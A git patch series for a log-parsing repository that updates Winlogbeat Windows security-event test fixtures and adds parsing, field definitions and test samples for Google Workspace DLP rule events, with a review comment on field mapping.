l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json index b69049f3d..3e7783fbd 100644 --- a/Beats/winlogbeat/tests/security_event_4798.json +++ b/Beats/winlogbeat/tests/security_event_4798.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was 
enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 
(WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account 
Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", From 97df98680856146f65f7555985ef2764e75c5312 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 14:24:35 +0100 Subject: [PATCH 037/150] Add rules service --- Google Cloud/google-report/_meta/fields.yml | 25 +++++++++ .../_meta/smart-descriptions.json | 50 +++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 23 ++++++++ .../tests/test_rules_sample_1.json | 55 +++++++++++++++++++ .../tests/test_rules_sample_2.json | 55 +++++++++++++++++++ 5 files changed, 208 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_rules_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_rules_sample_2.json 
diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..fd683eea8 100644
--- a/Google Cloud/google-report/_meta/fields.yml
+++ b/Google Cloud/google-report/_meta/fields.yml
@@ -33,6 +33,31 @@ google.report.parameters.visibility:
 name: google.report.parameters.visibility
 type: keyword
 
+google.report.rule.data_source:
+ description: Data source
+ name: google.report.rule.data_source
+ type: keyword
+
+google.report.rule.name:
+ description: Name of the rule
+ name: google.report.rule.name
+ type: keyword
+
+google.report.rule.scan_type:
+ description: Scan type
+ name: google.report.rule.scan_type
+ type: keyword
+
+google.report.rule.severity:
+ description: Severity of the rule
+ name: google.report.rule.severity
+ type: keyword
+
+google.report.rule.type:
+ description: Rule type
+ name: google.report.rule.type
+ type: keyword
+
 google.report.token.app_name:
 description: Token authorization application name
 name: google.report.token.app_name
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..9b88f06de 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -168,6 +168,56 @@
 }
 ]
 },
+ {
+ "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}",
+ "conditions": [
+ {
+ "field": "network.application",
+ "value": "rules"
+ },
+ {
+ "field": "event.action",
+ "value": "action_complete"
+ },
+ {
+ "field": "google.report.rule.severity"
+ },
+ {
+ "field": "google.report.rule.name"
+ },
+ {
+ "field": "google.report.rule.data_source"
+ },
+ {
+ "field": "google.report.rule.type"
+ }
+ ]
+ },
+ {
+ "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}",
+ "conditions": [
+ {
+ "field": "network.application",
+ "value": "rules"
+ },
+ {
+ "field": "event.action",
+ "value": "content_matched"
+ },
+ {
+ "field": "google.report.rule.severity"
+ },
+ {
+ "field": "google.report.rule.name"
+ },
+ {
+ "field": "google.report.rule.data_source"
+ },
+ {
+ "field": "google.report.rule.type"
+ }
+ ]
+ },
 {
 "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
 "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index bd5fd0d4e..e9640ba28 100644
--- a/Google Cloud/google-report/ingest/parser.yml
+++ b/Google Cloud/google-report/ingest/parser.yml
@@ -28,6 +28,8 @@ pipeline:
 filter: '{{ json_event.message.id.applicationName == "admin"}}'
 - name: set_vault_fields
 filter: '{{ json_event.message.id.applicationName == "vault"}}'
+ - name: set_rules_fields
+ filter: '{{ json_event.message.id.applicationName == "rules"}}'
 - name: set_parameters_fields
 filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
 
@@ -258,3 +260,24 @@ stages:
 {%- endif -%}
 {% endfor %}
 {{ types|unique|list }}
+
+ set_rules_fields:
+ actions:
+ - set:
+ google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}'
+
+ - set:
+ event.type: ["info"]
+ filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}'
+
+ - set:
+ event.type: ["deletion"]
+ filter: '{{ json_event.message.events[0].name == "label_removed"}}'
+
+ - set:
+ event.type: ["change"]
+ filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}'
diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json
new file mode 100644
index 000000000..3f7ef889b
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_rules_sample_1.json
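Review bot: The rule name is written only to the custom key `google.report.rule.name` in the first `set` of `set_rules_fields`, although ECS already defines `rule.name` for exactly this, so detections written against the standard field will never see Google DLP rules. Adding `rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}'` beside the custom key keeps the current output and exposes the rule cross-intake; `rule_resource_name` (the `policies/...` value in the new test samples) looks like a candidate for `rule.id`, to be confirmed against the Google schema. The three `event.type` sets cover only the listed event names, so any other `rules` event name leaves `event.type` unset; a short comment above the first `event.type` set stating whether that is intended would help the next maintainer. The `stages:` mapping that encloses this stage starts before the hunk.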
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 
IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json 
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
